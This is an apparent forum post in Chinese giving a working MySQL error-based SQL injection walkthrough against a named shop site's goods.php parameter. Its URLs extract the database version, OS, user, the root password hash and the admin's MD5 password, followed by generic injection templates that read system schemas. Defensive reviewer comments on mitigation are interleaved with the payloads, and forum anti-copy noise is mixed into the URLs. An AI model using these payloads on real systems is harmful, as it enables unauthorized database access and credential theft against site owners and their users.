
盲注详细内容

发表于 2012-9-5 14:59:30
判断版本号
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
判断系统
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%233 h/ s# c% S9 O; U$ H
当前 user()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 database()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%230 N( A' f6 K. Z9 y3 m0 }4 S, V1 `; Z


root hash
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

当前 数据库表名
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 数据库 user_name 字段

7 ^7 i# W  p( ehttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23) ^* F1 m# G! \# L3 |$ J. d

当前 数据库 字段 password
; b# |% e# X8 d# d1 Khttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%237 ]& z5 @5 y( ~, u4 l) I/ u( H7 J
获得 admin passwd(md5)

  Z5 U- O. p: |http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
报错注射
-- Reviewer note (defensive): the author's 报错注射 (error-based injection) template; `table_name`
-- and the `uid` value are placeholders, not a real target. The trailing UNION is only reachable
-- because the `uid = ...` value appears to be concatenated into the statement text; binding that
-- value as a parameter closes this whole class of issue. Detection: the application's database
-- account reading information_schema.tables, and count(*) / GROUP BY over rand() shapes in the
-- query log, are strong indicators. An error-based technique also depends on database error text
-- reaching the client, so keep raw database errors out of HTTP responses.
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
-- Reviewer note (defensive): same error-based shape as the preceding statement, here reading
-- `admin_table.username`; `admin_table` is a placeholder. The characters after the final `)` are
-- forum anti-copy noise, not part of the statement. Mitigation is unchanged: bind the `uid`
-- value as a parameter instead of concatenating it, run the application under a database account
-- that cannot read other schemas' tables, and do not echo raw database errors to clients.
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a); y/ P( A2 d' Y1 l0 R& S
-- Reviewer note (defensive): a WHERE-clause fragment (it begins with `and(`), not a standalone
-- statement. It reads a single schema name from information_schema.SCHEMATA (LIMIT 21,1), which
-- is why reads of SCHEMATA / TABLES by the application's database account are worth alerting on:
-- a normal application query has no reason to touch them. A least-privilege account and
-- parameterized queries limit both the impact and the dwell time of this pattern.
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)